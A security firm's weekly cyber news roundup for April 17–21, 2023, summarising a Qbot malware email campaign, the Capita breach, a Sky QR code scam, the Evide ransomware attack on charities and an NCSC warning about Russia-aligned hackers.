Weekly Cyber News Roundup

April 17th to 21st 2023

Content

01. This week’s observation from our Incident Response Team 
02. News Bites
  • Capita shares tumble 7% over concerns recent hack was worse than admitted

  • Sky issues warning to UK customers over malicious QR code hack

  • Multiple charities data stolen in ransomware attack 
  • NCSC Issues warning that UK Critical National Infrastructure is under severe threat from Russian affiliated hackers
03. Conclusion

A Note From The Cyber Threat Response Team

There's been a significant increase in Qbot malware usage. The current campaign sees threat actors targeting companies through hijacked business emails. Attackers join legitimate email threads, persuading victims to download a PDF attachment, ultimately installing the Qbot trojan on their computers. Qbot, first discovered in 2007 is a banking trojan designed to steal banking credentials, and since then it has gone through multiple modifications and improvements to become one of the most actively spread malware strains.

In this latest campaign the attackers use simulated business correspondence, making it difficult to track spam and increasing the likelihood of victims falling for the scam. The campaign starts with a PDF file attachment that mimics a Microsoft Office 365 or Microsoft Azure alert. Opening the PDF downloads an archive containing a Windows Script File, which reveals a payload PowerShell that downloads the Qbot trojan.

Qbot was the most prevalent malware in March, impacting over 10% of worldwide organisations highlighting just how effective it is. This latest campaign peaked between April 4 and April 12, with approximately 4,500 malicious emails detected. The campaign primarily targeted users in Germany, Argentina, and Italy but has also been observed in the UK and elsewhere.

The trojan uses .one and .iso files instead of traditional office documents with macros bypassing defences as most security software looks for the latter. Adding to its effectiveness is the fact that it uses phishing as it’s primary infection path, a technique that is still the main route for successful cyber-attacks.

 

Installing antivirus software on your devices is essential for protection against malware and as Qbot is frequently distributed through spam campaigns, being vigilant about the signs of malicious emails is crucial.

Quick News Bites

Capita shares tumble 7% over concerns recent hack was worse than admitted

Capita PLC (LSE:CPI) stock experienced a 7% decline following allegations that the recent cyber attack on the company was more severe than initially disclosed.

Personal banking information, residential addresses, and passport images are now being leaked online, seemingly pilfered by the hacker collective Black Basta.

Capita, holding £6.5 billion in government contracts with entities such as the NHS, the military, and the Cabinet Office, is responsible for managing the personal information of millions of citizens.

While the company acknowledged the breach earlier in the month, it maintained that individuals' personal data remained protected and Capita’s CEO even tweeted out that the companies response “will go down as a case history for how to deal with a sophisticated cyberattack”. 

Nonetheless, security specialists demonstrated that pages of data allegedly acquired from Capita were being offered for purchase on the dark web through Black Basta's site.

This collection of data encompasses individuals' phone numbers, over 100 bank accounts with their respective sort codes, and residential addresses.

These documents seem to be a fraction of the total data obtained, as the website indicates that additional access can be purchased using bitcoin.

The leaked information contains personal details of teachers seeking employment at schools, as well as bank account information for individuals and companies that supply Capita with products or services.

Sky issues warning to UK customers over malicious QR code hack

UK Sky subscribers are being cautioned about a harmful hacking technique employed by cybercriminals. The television provider has issued a high-level warning after discovering a clever scam that is easy to fall for and could result in significant financial loss for customers.

Sky, like many other companies, offers a QR code for customers to scan with their smartphones, simplifying and streamlining the account login process. However, it appears that cybercriminals have become aware of this approach and are now distributing counterfeit QR codes disguised as Sky's, directing customers to fraudulent websites.

On these imitation websites, designed to closely resemble Sky's legitimate sites, users' personal information - such as names, passwords, and bank account numbers - are then stolen.

Sky, stated in an announcement that as long as customers only utilize their phone's built-in camera to scan the code, they should not encounter any problems. The issues arise when individuals opt to use specialized QR Scanner apps found in online app stores, which often claim to offer enhanced features, making it simpler for scammers to access data on the user's phone.

Multiple charities data stolen in ransomware attack

A probe has commenced into a ransomware assault on a Northern Irish data management firm, Evide, which stores information for non-profit organizations and charities, including several groups assisting survivors of sexual assault.

On March 30th, the PSNI was alerted to a cyber event and assigned the case to their Cyber Crime Investigation Team's expert detectives, who are continuing their inquiries.

Evide offers data management services to its clients, with annual fees ranging from £720 to £1,200, as stated on the company's website.

The National Cyber Security Centre and the Data Protection Commission have been informed about the security breach.

Ossian Smyth, Minister of State for eGovernment, spoke with RTÉ's News at One, confirming that several organisations in the Republic of Ireland have been affected.

"Among them are community and voluntary groups, and four focus on addressing sexual abuse and rape," Smyth mentioned.

"For individuals who utilize these services or have entrusted their data to these organisations, I understand their concern, as they have shared highly confidential and personal information," he added.

Smyth revealed that the personal information of 2,000 people in the Republic of Ireland has been compromised by the cyberattack.

He further stated that the PSNI in Northern Ireland is conducting a criminal investigation into the incident, in collaboration with An Garda Síochána.

"Everyone whose data has been compromised will be notified," he assured.

NCSC Issues warning that UK Critical National Infrastructure is under severe threat from Russian affiliated hackers

Cabinet Office Minister Oliver Dowden has warned that Russia-aligned hackers aim to disrupt or destroy the UK's critical infrastructure, with a growing focus on the nation in recent months. To combat this threat, new measures have been introduced to bolster businesses at the forefront of cyber defense. The National Cyber Security Centre (NCSC), part of the UK's cyber and intelligence agency GCHQ, issued a threat alert to critical businesses, urging organizations responsible for energy and water supplies to take immediate action to protect against this emerging cyber risk.

The NCSC identifies these hacking groups as ideologically motivated, often sympathizing with Russia's invasion of Ukraine. These groups, described as "Wagner-like," are deemed less predictable due to their independence from formal state control. The NCSC anticipates that these groups will seek opportunities to create significant disruption, especially if systems are inadequately protected.

Addressing the CyberUK conference in Belfast, Dowden stressed the importance of disclosing this threat to ensure businesses comprehend the risks and take necessary action. As Chancellor of the Duchy of Lancaster, he announced plans to establish cyber resilience targets for critical sectors to achieve within two years, extending resilience regulations to private sector businesses involved in critical infrastructure.

Lindy Cameron, CEO of the NCSC, emphasized the need to protect the UK's critical national infrastructure from hackers and prepare for potential future threats. She acknowledged recent low-level attempts to target UK infrastructure and the need for heightened security and resilience, given the increasing cyber activity in Ukraine due to Russia's conflict.

Closing Summary

If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation. 

Disclaimer

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.

Need advice?

If you are worried about any of the threats outlined in this roundup or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager or fill in the form for a complimentary no-commitment consultation.

More detailed threat intelligence news?

If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.

We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.

Security-first-stacked-logo4-No-Padding

Cyber Security Conference

LONDON | 28 April 2022
DUBLIN | 11 May 2022

Join us in Dublin or London for the Security First 2022 conference.  We'll be bringing together industry professionals and specialist experts to discuss the latest cyber security trends and offer actionable advice on preparing your business to put security first in 2022.